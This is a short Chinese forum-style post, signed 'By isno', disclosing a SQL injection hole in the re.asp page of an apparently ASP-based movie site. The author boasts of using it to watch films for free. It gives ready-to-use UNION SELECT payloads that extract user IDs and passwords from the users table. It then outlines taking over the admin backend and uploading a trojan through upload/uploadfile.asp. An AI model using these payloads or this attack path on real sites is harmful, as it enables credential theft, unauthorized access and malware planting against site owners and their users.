这个漏洞实在不想说,靠这个看了不少免费电影!
现在公布一下吧:
就是re.asp里面对id参数未过滤。
这样来利用
re.asp?id=0 union select 1,1,1 from users where oklook>=5(4,3,2,1)
re.asp?id=0 union select 1,userid,password from users where oklook>=5
re.asp?id=0 union select 1,userid,password from users where oklook>=5 and userid not in ('exists','exists1','exists2',........)
其他的就是关于管理员的猜测,如果可以破解,就可以进入后台,可以进入后台,就可以上传木马
upload/uploadfile.asp
不过,对于一些有补丁的,不能上传木马哦!
----------------------------------------------------------------------------------------------- By isno
浙公网安备 33010602011771号